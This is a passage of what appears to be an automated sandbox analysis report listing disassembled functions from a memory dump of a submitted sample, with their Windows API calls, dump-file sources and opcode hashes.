                                                            • Opcode ID: 96eb43120e3fd3a0e5e46a9907b07323b4a195a7d82a503bfb9fd0e950105612
                                                            • Instruction ID: 1a40b9365eff1ae7d7ca5e0099a7181caca39765335d844969998ecb4042ec02
                                                            • Opcode Fuzzy Hash: 96eb43120e3fd3a0e5e46a9907b07323b4a195a7d82a503bfb9fd0e950105612
                                                            • Instruction Fuzzy Hash: CAC18370A00254ABEF15CF6CC498BA9BBE5EF15310F1809FBEC559B396EB309944CB61
                                                            Function 00BD3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 5e3a8df4932a02ad9d68b2e8785afbdce9e2ded0021e092198566474c2e43ef5
                                                            • Instruction ID: 1e54b6ad2b74385a7f135d620045233a3f4374623ddb5c3e070290f2e593016f
                                                            • Opcode Fuzzy Hash: 5e3a8df4932a02ad9d68b2e8785afbdce9e2ded0021e092198566474c2e43ef5
                                                            • Instruction Fuzzy Hash: 4971C271500B849ECB25DB70C8959E7F7E9EF14701F4409AFE1AB87342EA326684DF12
                                                            Function 00BD8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD8289
                                                              • Part of subcall function 00BD13DC: __EH_prolog.LIBCMT ref: 00BD13E1
                                                              • Part of subcall function 00BDA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BDA598
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$CloseFind
                                                            • String ID:
                                                            • API String ID: 2506663941-0
                                                            • Opcode ID: 52a79ac8c54465e8c0c958df03df5587d6c2622debc40cf59ad3ec938be44445
                                                            • Instruction ID: fc38769f0b92b9c92425472b660919afe968973f7d43f9427d88fd8a92052380
                                                            • Opcode Fuzzy Hash: 52a79ac8c54465e8c0c958df03df5587d6c2622debc40cf59ad3ec938be44445
                                                            • Instruction Fuzzy Hash: 2B4193719446589ADB24EB60CC55AEAF3E8EF00704F0404EBE08E97283FB745EC4CB10
                                                            Function 00BD13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD13E1
                                                              • Part of subcall function 00BD5E37: __EH_prolog.LIBCMT ref: 00BD5E3C
                                                              • Part of subcall function 00BDCE40: __EH_prolog.LIBCMT ref: 00BDCE45
                                                              • Part of subcall function 00BDB505: __EH_prolog.LIBCMT ref: 00BDB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: a314c98bf7a2e100914af19e97102cb3872d371468e19f6a37666604a826bda7
                                                            • Instruction ID: 8aa5c30de85bc0fe1caa8d1f433895d96034ddca439e7663f8f79be46b494bdb
                                                            • Opcode Fuzzy Hash: a314c98bf7a2e100914af19e97102cb3872d371468e19f6a37666604a826bda7
                                                            • Instruction Fuzzy Hash: 144149B0905B41AEE724DF398885AE6FBE5BF28300F50496ED5FE83382DB316654CB50
                                                            Function 00BD13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD13E1
                                                              • Part of subcall function 00BD5E37: __EH_prolog.LIBCMT ref: 00BD5E3C
                                                              • Part of subcall function 00BDCE40: __EH_prolog.LIBCMT ref: 00BDCE45
                                                              • Part of subcall function 00BDB505: __EH_prolog.LIBCMT ref: 00BDB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 1049bc508937651850067ddabcc97bb1abca825174c0650d78634dfc0fc645f5
                                                            • Instruction ID: 51d9089c961327ff4c0d14dfb13b442ef70c664518b858aef54f36b1b528bb3b
                                                            • Opcode Fuzzy Hash: 1049bc508937651850067ddabcc97bb1abca825174c0650d78634dfc0fc645f5
                                                            • Instruction Fuzzy Hash: 464149B0905B409EE724DF798885AE6FBE5BF28300F50496ED5FE83282DB326654CB50
                                                            Function 00BEB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BEB098
                                                              • Part of subcall function 00BD13DC: __EH_prolog.LIBCMT ref: 00BD13E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: dd3ce1df275981b66dbf0e38671961d4919da51bcae49caa6f3f3f52f312a584
                                                            • Instruction ID: ea47077fbfbf9fd245b1c939ce53d0fddfb548337f8e29ce7cf95393d5274771
                                                            • Opcode Fuzzy Hash: dd3ce1df275981b66dbf0e38671961d4919da51bcae49caa6f3f3f52f312a584
                                                            • Instruction Fuzzy Hash: B8316B71C14289AACF15DF69C9919EEBBF4AF09300F1044DEE409B7242E735AE04CB61
                                                            Function 00BFAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00BFACF8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: 52f7c5e716bd8925e44ccb87ab49215b176a90b11fb51478c4f34b1964d92fe7
                                                            • Instruction ID: 3148d1f162891a4a2897d3f39142727338e2e8896c2912bc9200011719a587ba
                                                            • Opcode Fuzzy Hash: 52f7c5e716bd8925e44ccb87ab49215b176a90b11fb51478c4f34b1964d92fe7
                                                            • Instruction Fuzzy Hash: 7811C4B76002296B9B2A9A1CEC50A7AB3D5EB8432071A45A0EE19EB254D630DC05C6D2
                                                            Function 00BD9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 556defa33f4153c9bb3c2c73f40dde141a779ea939b5fd7d4785f0d801bc9c94
                                                            • Instruction ID: 355dd723598c54184d777447994558f070db477fbdbdb0138dc9c03ed3b1c85d
                                                            • Opcode Fuzzy Hash: 556defa33f4153c9bb3c2c73f40dde141a779ea939b5fd7d4785f0d801bc9c94
                                                            • Instruction Fuzzy Hash: 4F016973900564ABCF11AB68CD819DEFBB5EF88750F054696E815B7351EA34CD04C7A0
                                                            Function 00BFC479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BFB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BF9813,00000001,00000364,?,00BF3F73,00000050,?,00C11030,00000200), ref: 00BFB177
                                                            • _free.LIBCMT ref: 00BFC4E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                            • Instruction ID: 0795501ffff8e424b15568eaf9e4fd9673a62d7466e2c2ee34227bcc4455e7e7
                                                            • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                            • Instruction Fuzzy Hash: 6801D67320030D6BE331CF69D88597AFBE9EB85370F25056DE69493281EB30A949C764
                                                            Function 00BFB136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BF9813,00000001,00000364,?,00BF3F73,00000050,?,00C11030,00000200), ref: 00BFB177
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: db285be37a2f0c84ea0a58e093fb60418026112f7a1e1e96ebd7ffe664c5c955
                                                            • Instruction ID: 6756586b36e18efc320b9535f627ee969a6302e1717bf932310ec86f4cb30ca7
                                                            • Opcode Fuzzy Hash: db285be37a2f0c84ea0a58e093fb60418026112f7a1e1e96ebd7ffe664c5c955
                                                            • Instruction Fuzzy Hash: B6F0B43252512CB7DB255A21EC16F7F77C8EF41760B1982E1FA08B7190CB30DB0986E0
                                                            Function 00BF3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00BF3C3F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: 169333c8d8cc2a5aa2c00c905c8103a912a3c7b346d7fd00aaa75da75b5f2b38
                                                            • Instruction ID: 22611c17455271c6c66c89c3b3ef1282d09f5e610e614e963a4c353ee4d19d8d
                                                            • Opcode Fuzzy Hash: 169333c8d8cc2a5aa2c00c905c8103a912a3c7b346d7fd00aaa75da75b5f2b38
                                                            • Instruction Fuzzy Hash: AAF0E53221031E9FCF158EA8EC00BAA77E9EF01F207104165FB05E7190DB31DA24C790
                                                            Function 00BF8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BFCA2C,00000000,?,00BF6CBE,?,00000008,?,00BF91E0,?,?,?), ref: 00BF8E38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 85878312dbf0ec9b37bad24f1705a5ab5f5ba79b0a339e97a87824777ddc8749
                                                            • Instruction ID: 4c7bcaf6507ed36d35d856ddabfcb50267ef5a5678e3b3d172702ff4b7cc928e
                                                            • Opcode Fuzzy Hash: 85878312dbf0ec9b37bad24f1705a5ab5f5ba79b0a339e97a87824777ddc8749
                                                            • Instruction Fuzzy Hash: 33E06D3560622D67EA7226659D05BBF76C8DF417A4F1601E1BF18AB095CF20CD0882E1
                                                            Function 00BD5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD5AC2
                                                              • Part of subcall function 00BDB505: __EH_prolog.LIBCMT ref: 00BDB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 2d35a025f8a76441b392c044031d44646f1260f8e9573f5c3a0a3cb60eebb066
                                                            • Instruction ID: 6ee2375e90aef8151d9c0f63ff58131f3c5d94787e33a785dfd5974bfac599a1
                                                            • Opcode Fuzzy Hash: 2d35a025f8a76441b392c044031d44646f1260f8e9573f5c3a0a3cb60eebb066
                                                            • Instruction Fuzzy Hash: A50169308206D0DED725F7B8C0557DDFBE49FA4305F5484CEA45663282CBB81B08D6A2
                                                            Function 00BDA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BDA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA6C4
                                                              • Part of subcall function 00BDA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA6F2
                                                              • Part of subcall function 00BDA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA6FE
                                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BDA598
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                            • String ID:
                                                            • API String ID: 1464966427-0
                                                            • Opcode ID: 1f37c7750d2e492cb5326b3f336e6dec6e81524e6c5e2c997c1625f92bf43bd5
                                                            • Instruction ID: 52fa5e8349127549a3022634bc437643ba83631182df0a1373e1bdacf89dd845
                                                            • Opcode Fuzzy Hash: 1f37c7750d2e492cb5326b3f336e6dec6e81524e6c5e2c997c1625f92bf43bd5
                                                            • Instruction Fuzzy Hash: F7F08236009790EACF2257B49944BCBFBD46F2A335F048A8BF1FD52296D27550949B23
                                                            Function 00BE0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 00BE0E3D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ExecutionStateThread
                                                            • String ID:
                                                            • API String ID: 2211380416-0
                                                            • Opcode ID: 2696004e8f0fc67ade72da671209c2ec646754433ac4fb44227e40919b861506
                                                            • Instruction ID: f2b3bf04aee7fc184b2c574d50fd96a19876b21fadfcbf5c18b2e05fbc42759c
                                                            • Opcode Fuzzy Hash: 2696004e8f0fc67ade72da671209c2ec646754433ac4fb44227e40919b861506
                                                            • Instruction Fuzzy Hash: 66D01221E250D556DA11333A68557FE26CACFCB311F0D04E7B64957282DBA848C6A261
                                                            Function 00BEA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GdipAlloc.GDIPLUS(00000010), ref: 00BEA62C
                                                              • Part of subcall function 00BEA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00BEA3DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                                            • String ID:
                                                            • API String ID: 1915507550-0
                                                            • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                            • Instruction ID: e306d76066f3de20231300985edb6df79a7a14d0b79c0abb9bf2dffae16c89bb
                                                            • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                            • Instruction Fuzzy Hash: E8D0C971210249BADF426F738C5296E7ADEFB01340F0481A5B842D9291EBB1FD10A666
                                                            Function 00BEE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • DloadProtectSection.DELAYIMP ref: 00BEE5E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: DloadProtectSection
                                                            • String ID:
                                                            • API String ID: 2203082970-0
